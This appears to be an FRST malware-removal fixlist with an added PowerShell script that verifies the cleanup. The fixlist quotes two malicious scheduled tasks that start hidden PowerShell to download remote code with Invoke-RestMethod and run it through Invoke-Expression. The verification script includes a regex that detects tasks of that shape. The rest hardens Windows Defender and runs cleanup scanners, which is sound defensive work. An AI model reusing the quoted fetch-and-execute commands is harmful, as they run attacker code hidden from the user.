Start::
CreateRestorePoint:
CloseProcesses:
2026-04-29 12:08 - 2026-04-29 22:36 - 000000000 ____D C:\Users\iamto\pp.exe
2026-04-29 12:07 - 2026-01-11 12:04 - 000000000 ____D C:\Users\iamto\AppData\Roaming\RenPy
FirewallRules: [TCP Query User{925DC12F-6DB7-4565-A1D6-C762B157C180}C:\users\iamto\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\iamto\appdata\roaming\spotify\spotify.exe => No File
FirewallRules: [UDP Query User{6C329461-70B5-47F5-BEF0-75E7C32FEF69}C:\users\iamto\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\iamto\appdata\roaming\spotify\spotify.exe => No File
FirewallRules: [{AF2FE679-E12B-4BA5-866D-B04C84A1D1D3}] => (Allow) E:\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{4018065F-ABEC-42FC-AA9B-F71482252768}] => (Allow) E:\Hytale\install\pre-release\package\game\latest\Client\HytaleClient.exe => No File
FirewallRules: [{981571D6-56A0-4EF9-80C1-474D7D7A72C8}] => (Allow) E:\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{D92D9F13-6BA5-453C-80FD-9B2F1FEAD314}] => (Allow) E:\Hytale\install\pre-release\package\jre\latest\bin\java.exe => No File
FirewallRules: [{D2B1A051-58CB-4C5E-815C-78328B6A4660}] => (Allow) C:\Program Files\Razer\RazerAppEngine\app-4.0.660\RazerAppEngine.exe => No File
S4 AmdTools64; \SystemRoot\System32\drivers\AmdTools64.sys (No File)
S3 EAAntiCheat; system32\drivers\eaanticheat.sys (No File)
S3 MpKslb48901b8; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4FBF6DB0-19C8-4B8C-9B36-43D86D6A41C9}\MpKslDrv.sys (No File)
S3 SIUSBXP; \??\C:\Windows\system32\drivers\SiUSBXp.sys (No File)
HKU\S-1-5-21-1170504821-116563046-2204524539-1001\...\Run: [Player2] => C:\Users\iamto\AppData\Local\Player2\player2.exe [83643184 2026-04-22] (ELEFANT AI INC. -> player2) <==== ATTENTION
Task: {B9651CD1-3367-466F-BD00-7827B6F06E3E} - System32\Tasks\Google Compatibility Appraiser CL_NCL_475b30882d9b5208 => C:\Windows\system32\conhost.exe [867840 2026-01-13] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Task: {9F01C1F5-6016-4304-A6D8-DC5A996B3E2E} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem47.0.7703.CL_NCL_475b30882d9b5208{47263A17-2D66-43B9-9692-56314D0C1AEC} => C:\Windows\system32\conhost.exe [867840 2026-01-13] (Microsoft Windows -> Microsoft Corporation) -> --headless C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -ExecutionPolicy Bypass -WindowStyle Hidden -Command "if(!(Get-Process CheckNetIsolation,CloudExperienceHostBroker -EA 0)){Invoke-RestMethod 79.8141710/cl-ncl-following | Invoke-Expression}else{exit 1}" <==== ATTENTION
Folder: C:\Users\iamto\AppData\Local\Player2
2026-04-29 12:08 - 2026-04-29 12:08 - 000004410 _____ C:\Windows\system32\Tasks\Google Compatibility Appraiser CL_NCL_475b30882d9b5208
StartPowershell:
Try {
    # Collect every Defender exclusion currently configured and remove it
    $Paths = (Get-MpPreference).ExclusionPath
    $Extensions = (Get-MpPreference).ExclusionExtension
    $Processes = (Get-MpPreference).ExclusionProcess
    foreach ($Path in $Paths) {
        Remove-MpPreference -ExclusionPath $Path -Force -ErrorAction Stop
    }
    foreach ($Extension in $Extensions) {
        Remove-MpPreference -ExclusionExtension $Extension -Force -ErrorAction Stop
    }
    foreach ($Process in $Processes) {
        Remove-MpPreference -ExclusionProcess $Process -Force -ErrorAction Stop
    }
}
Catch {
    Write-Error "Error occurred while removing Windows Defender exclusions: $_"
}
EndPowershell:
StartPowerShell:
# Enable real-time protection
Set-MpPreference -DisableRealtimeMonitoring $false
# Enable behavioural protection
Set-MpPreference -DisableBehaviorMonitoring $false
# Enable PUP detection
Set-MpPreference -PUAProtection Enabled
# Set cloud protection to level 4 (aggressively block unknowns and apply additional protection measures); alternatively use 2 for lower protection or 0 for the default
Set-MpPreference -CloudBlockLevel 4
# Send advanced information about malicious/unwanted software present on your device
Set-MpPreference -MAPSReporting 2
# Send safe samples automatically to Microsoft
Set-MpPreference -SubmitSamplesConsent 1
# Enable Network Protection, which inspects network traffic to block connections to malicious websites
Set-MpPreference -EnableNetworkProtection Enabled
# Enable Block at First Sight
Set-MpPreference -DisableBlockAtFirstSeen $false
# Allow scanning of archive files, such as .zip and .cab files, for malware/PUP
Set-MpPreference -DisableArchiveScanning $false
# Enable automatic scanning of USB and removable drives
Set-MpPreference -DisableRemovableDriveScanning $false
# Enable scanning of network files
Set-MpPreference -DisableScanningNetworkFiles $false
# Check for signature updates before running a scan
Set-MpPreference -CheckForSignaturesBeforeRunningScan $true
# Extend the cloud check timeout from the default 10 seconds to 30 seconds
Set-MpPreference -CloudExtendedTimeout 30
# Enable automatic scanning of all downloaded files and attachments
Set-MpPreference -DisableIOAVProtection $false
# Enable script scanning
Set-MpPreference -DisableScriptScanning $false
# Disable the automatic (server role based) exclusions from scanning
Set-MpPreference -DisableAutoExclusions $true
# Enable scanning of mapped network drives during a full scan
Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $false
# Enable scanning of email files
Set-MpPreference -DisableEmailScanning $false
# Enable blocking of malicious domains and IPs at the DNS level
Set-MpPreference -EnableDnsSinkhole $true
# Set the signature update interval to every 12 hours
Set-MpPreference -SignatureUpdateInterval 12
# Enable automatic quarantine for threats rated high and severe
Set-MpPreference -HighThreatDefaultAction Quarantine
Set-MpPreference -SevereThreatDefaultAction Quarantine
# Update signatures now
Update-MpSignature
EndPowerShell:
StartPowerShell:
# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory 2) important folders, as the documentation says.
# It will scan inside compressed archives, mail archives and NTFS alternate data streams, and use cloud requests.
# ---
# You can use the argument "/delete" to delete found objects including references, but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan, but that may take longer than what FRST can handle.
# You can use the argument /quarantine="[folder]" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
# Silent self-extraction into $extractPath; the extractor is stopped once a2cmd.exe has appeared.
# The wait is capped at 10 minutes so a failed download or extraction cannot hang the fix forever.
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
$waited = 0
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe") -and $waited -lt 600) {
    Start-Sleep -Seconds 1
    $waited++
}
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if (-not (Test-Path "$extractPath\bin64\a2cmd.exe")) {
    Write-Error "EEK did not extract to $extractPath within 10 minutes; skipping the scan."
    exit
}
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
# Update signatures, then run the scan and write its log next to the other FRST output
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit
EndPowerShell:
StartPowerShell:
# Downloads the newest AdwCleaner version directly from Malwarebytes, updates it, scans, cleans and writes the log to the console.
# Does not clean preinstalled objects, only PUP/Adware.
# If you would like to delete preinstalled objects as well, add /preinstalled after the /clean argument.
# If you would like to only scan with it, change the argument from /clean to /scan.
New-Item -ItemType Directory -Force -Path "$env:SystemDrive\AdwCleaner" | Out-Null
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/eula" -Wait -WindowStyle Hidden
$logFile = "$env:SystemDrive\AdwCleaner\AdwCleanerOutputFRST.txt"
Start-Process -FilePath "$env:SystemDrive\AdwCleaner\AdwCleanerFRST.exe" -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
EndPowerShell:
CMD: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Warn" /f
CMD: reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 1 /f
CMD: netsh int ip reset
CMD: netsh int ipv6 reset
CMD: ipconfig /flushDNS
CMD: netsh winsock reset catalog
C:\Users\CurrentUserName\AppData\Local\Temp\*
C:\Windows\Temp\*
C:\Windows\SystemTemp\*
EmptyTemp:
End::
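
Once FRST has run the fixlist and the machine has rebooted, the sensible next step is to confirm that the persistence entries are really gone and that the Defender settings took effect. The script below is an added verification example; it is not part of the fixlist, is not FRST syntax, and must be run on its own in an elevated PowerShell window. The task names, the Player2 Run value and the Defender values are copied from the fixlist above and are specific to this case; on another system they will differ. The generic task sweep (section 2) goes slightly beyond the fixlist: it flags any remaining scheduled task whose action has the same shape as the two removed ones, for manual review only.

```powershell
# Post-fix verification, added as an example; not part of the FRST fixlist.
# Run in an elevated PowerShell after FRST has finished and the system rebooted.
# Task names, the Run value and the Defender settings come from the fixlist and
# are specific to this case; adjust them for any other system.

$problems = @()

# 1. Case-specific persistence that the fixlist removed must be gone.
$taskNames = @(
    'Google Compatibility Appraiser CL_NCL_475b30882d9b5208',
    'GoogleUpdaterTaskSystem47.0.7703.CL_NCL_475b30882d9b5208{47263A17-2D66-43B9-9692-56314D0C1AEC}'
)
foreach ($name in $taskNames) {
    if (Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue) {
        $problems += "Scheduled task still present: $name"
    }
}
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$runValues = (Get-ItemProperty -Path $runKey -ErrorAction SilentlyContinue).PSObject.Properties.Name
if ($runValues -contains 'Player2') { $problems += 'Run value Player2 still present' }
if (Test-Path "$env:LOCALAPPDATA\Player2") { $problems += 'Folder Player2 still present' }

# 2. Generic sweep: the removed tasks used conhost.exe --headless to start a hidden
#    PowerShell that pipes a download into Invoke-Expression. Any remaining task
#    with the same shape is listed for manual review; nothing is deleted here.
$suspiciousPattern = 'conhost\.exe.*--headless|Invoke-Expression|\biex\b|-ExecutionPolicy Bypass.*-WindowStyle Hidden'
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match $suspiciousPattern) {
            $problems += "Review task $($task.TaskPath)$($task.TaskName): $cmd"
        }
    }
}

# 3. Defender settings must match the Set-MpPreference block, and no exclusions may remain.
#    Get-MpPreference reports enum values numerically, so the expected values are numeric.
$pref = Get-MpPreference
$expected = @{
    DisableRealtimeMonitoring = 0
    DisableBehaviorMonitoring = 0
    PUAProtection             = 1   # Enabled
    CloudBlockLevel           = 4
    MAPSReporting             = 2   # Advanced
    SubmitSamplesConsent      = 1   # SendSafeSamples
    EnableNetworkProtection   = 1   # Enabled
    DisableBlockAtFirstSeen   = 0
    DisableIOAVProtection     = 0
    DisableScriptScanning     = 0
    SignatureUpdateInterval   = 12
}
foreach ($setting in $expected.Keys) {
    if ([int]$pref.$setting -ne $expected[$setting]) {
        $problems += "Defender $setting is '$($pref.$setting)', expected $($expected[$setting])"
    }
}
foreach ($list in 'ExclusionPath', 'ExclusionExtension', 'ExclusionProcess') {
    if ($pref.$list) { $problems += "Defender $list still contains: $($pref.$list -join ', ')" }
}

if ($problems.Count -eq 0) {
    'OK: persistence removed and Defender configured as in the fixlist'
} else {
    $problems | ForEach-Object { "PROBLEM: $_" }
}
```

If the script reports a task that is still present or a Defender setting that did not stick, that usually means the fix ran without the expected privileges or the malware re-created the entry before the reboot; in that case a fresh FRST scan log is the right thing to post, not a repeat of the same fixlist.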